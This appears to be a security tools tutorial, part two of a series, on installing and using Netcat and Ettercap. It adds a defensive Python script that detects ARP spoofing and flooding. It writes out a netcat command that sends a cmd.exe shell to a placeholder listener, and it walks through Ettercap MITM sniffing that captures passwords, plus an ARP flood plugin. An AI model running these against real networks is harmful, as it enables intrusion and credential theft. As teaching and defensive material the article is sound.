Tools of the Trade (Part 2)

In part one of this article series we went over some must-have tools like a packet sniffer and a network scanner. We also covered their installation and basic usage examples. What we shall now do in part two is cover some of the other tools that should definitely be in your arsenal of computer security tools. Please bear in mind again that XP SP2 broke a lot of computer security tools. I shall point out which platform I am installing each tool on, and will also mention whether it can be used on XP SP2. Failing that, simply install the tool on either an XP SP1 computer or a Windows 2000 Professional one.

The superlative Netcat

The tool netcat has often been compared to the “Swiss army knife of TCP/IP”. It is one of the best known tools out there and is really quite indispensable. Please download it here. Once downloaded, simply decompress the file and place nc.exe in the root of the C drive, i.e. C:\. You are now ready to use Netcat! Please see the screenshot below for the help menu.

Figure 1

For a quick demo let’s use the following command syntax, where <listener-ip> is a placeholder for the address of the other computer:

nc.exe <listener-ip> 5555 -e cmd.exe

This syntax will export a cmd.exe to another computer which has netcat listening on port 5555. Pretty neat! Please see the screenshot below for the example.

Figure 2

Please bear in mind that on one computer I entered the command syntax noted above to export the cmd.exe to the other computer, which had netcat listening on port 5555 as shown in the screenshot above. This is just one of the things that netcat can do for you. You will note in the help menu that there are quite a few other options available to you. This tool also has the ability to do source routing up to four hops away. Netcat may not be as good as Nmap, but it has the ability to do port scanning as well. You can also use it to bind to certain ports for enumeration purposes. The list really does go on. There are many excellent tutorials out there that will show detailed usage of this excellent tool, and I encourage you to play with it.

Fun with Ettercap

Ettercap is one of those tools that can do an incredible number of things. It is, by design, a tool for MITM (man in the middle) attacks. Notably, its greatest strength is the ability to work in switched environments. Typically on a switched network you would not have the ability to see the traffic from another segment. With Ettercap you most certainly do, and it achieves this through several means. With that said, let’s get the tool downloaded and installed. If you raced ahead and tried to use it already, you may have noticed that it gives you errors about some dll files. Please check here for the fix. You will see that you have to rename libnet.dll and packet.dll to simply libnet and packet. Once you have done so you will be able to use Ettercap. Please see the screenshot below for what it looks like in action.

Figure 3

All I have done in the above screenshot is click on the “Start” menu, and then “Start Sniffing”. From there I went to the “Hosts” menu and clicked on “Scan for Hosts”. Once that was done I checked the hosts that were found in the “Host List”. From there I added the address to the target list. A short while after that, Ettercap sniffed out both my email account usernames and passwords. While neat, this is by far the least impressive aspect of Ettercap. Another neat feature is that after you have been sniffing for a while you can click on “View” and then “Profiles”. Up will come a list of IP addresses; simply double-click on one of them to get more detailed info such as its MAC address, its distance from you in hops, the operating system it is probably running, and so on. Any sniffed usernames and passwords will be listed there as well.

The meat of Ettercap, though, can be found in the “Plugins” menu. Once there you will notice that there is a large variety of plugins to be used. For example, try the “rand_flood” plugin. To enable it simply double-click on it, and to stop it do the same again. Before you do this, though, make sure you start the packet sniffer that I gave you a link to in part one of this article series. This will allow you to see how Ettercap performs this ARP flood. For those who have not done so, please see the screenshot below.

Figure 4

You can see from the above screenshot that there is indeed garbage being generated by Ettercap. You would typically see “arp who-has tell”, for example, and not the garbage that Ettercap generated. This is but one of the many, many plugins that you can see in the “Plugins” menu. Remember to have that packet sniffer running so that you can give context to the plugin in use by viewing the packets it generates. Some of the other interesting plugins that you should give a whirl are the SMB ones that are listed. On an internal network the information gleaned via the SMB protocol can indeed be of use to a hacker. Ettercap is extremely useful to the security professional precisely because it is also used by those who try to hack your very networks.
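As an added example (my own code, not part of the original article or of Ettercap), here is a small Python audit that decodes raw Ethernet/ARP frames and flags the kind of traffic the screenshot shows: a burst of ARP frames, sender MACs that do not match the Ethernet source, sender IPs from outside the local subnet, and one IP claimed by several MACs. The traffic it checks is constructed inline; the 20-frame flood threshold is an assumption you would tune to your network.

```python
import ipaddress
import struct
from collections import defaultdict

ETH_ARP = 0x0806  # EtherType for ARP


def build_arp(eth_src, eth_dst, oper, sha, spa, tha, tpa):
    """Construct a raw Ethernet+ARP frame (sample traffic, not a capture)."""
    mac = lambda m: bytes.fromhex(m.replace(":", ""))
    ip = lambda a: ipaddress.IPv4Address(a).packed
    eth = mac(eth_dst) + mac(eth_src) + struct.pack("!H", ETH_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, oper,
                      mac(sha), ip(spa), mac(tha), ip(tpa))
    return eth + arp


def parse_arp(frame):
    """Decode the fields the audit needs; returns None for non-ARP frames."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_ARP:
        return None
    _, _, _, _, oper, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {"eth_src": frame[6:12].hex(":"), "oper": oper, "sha": sha.hex(":"),
            "spa": str(ipaddress.IPv4Address(spa)), "tpa": str(ipaddress.IPv4Address(tpa))}


def audit_arp(frames, local_net, flood_threshold=20):
    """Return (reason, detail) findings for frames captured in one short time window."""
    net = ipaddress.IPv4Network(local_net)
    findings, ip_to_macs, seen = [], defaultdict(set), 0
    for frame in frames:
        p = parse_arp(frame)
        if p is None:
            continue
        seen += 1
        if p["eth_src"] != p["sha"]:            # ARP sender MAC disagrees with frame source
            findings.append(("sender-mac-mismatch", p))
        if ipaddress.IPv4Address(p["spa"]) not in net:  # sender claims an off-subnet address
            findings.append(("foreign-sender-ip", p))
        ip_to_macs[p["spa"]].add(p["sha"])
    for ip, macs in ip_to_macs.items():          # classic ARP spoofing symptom
        if len(macs) > 1:
            findings.append(("ip-claimed-by-multiple-macs", (ip, sorted(macs))))
    if seen > flood_threshold:                   # rand_flood-style burst
        findings.append(("arp-flood", seen))
    return findings


def demo_findings():
    """Constructed window: a normal request/reply, one spoofed gateway reply, 25 garbage frames."""
    gw, host, rogue = "00:aa:bb:cc:dd:01", "00:11:22:33:44:55", "de:ad:be:ef:00:01"
    frames = [build_arp(host, "ff:ff:ff:ff:ff:ff", 1, host, "192.168.1.10", "00:00:00:00:00:00", "192.168.1.1"),
              build_arp(gw, host, 2, gw, "192.168.1.1", host, "192.168.1.10"),
              build_arp(rogue, host, 2, rogue, "192.168.1.1", host, "192.168.1.10")]
    for i in range(25):  # garbage replies with made-up sender MAC/IP pairs (constructed)
        frames.append(build_arp(rogue, "ff:ff:ff:ff:ff:ff", 2, f"02:00:00:00:00:{i:02x}",
                                f"10.{i}.{i}.{i}", "00:00:00:00:00:00", "192.168.1.10"))
    return audit_arp(frames, "192.168.1.0/24")
```

Feed `audit_arp` the ARP frames from a sniffer capture split into short windows and the flood finding lines up with the burst you see in the screenshot.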

While it may appear to you to be a GUI-only tool, don’t be mistaken, for it can also be controlled from the command line in a DOS prompt. I state this simply because it could be installed and then used remotely. It is not only a local attack.

Well, so far we have learnt about the tools Netcat and Ettercap: two very formidable hacking tools when used properly and with a little knowledge. Ettercap alone can keep you busy exploring its many features for some time. Ideally you will explore this tool’s uses in a switched environment to take full advantage of its capabilities.

On that note I will wrap up part two of this article series. In the third and final part of this series we will look at two other tools, namely Nemesis the packet crafter and SPIKE the HTTP proxy. Learning how to use an HTTP proxy will pay dividends to you not only in understanding HTTP better, but also in web application security. We will install both of these tools and play with their functionality. Till next time, have fun and keep learning!
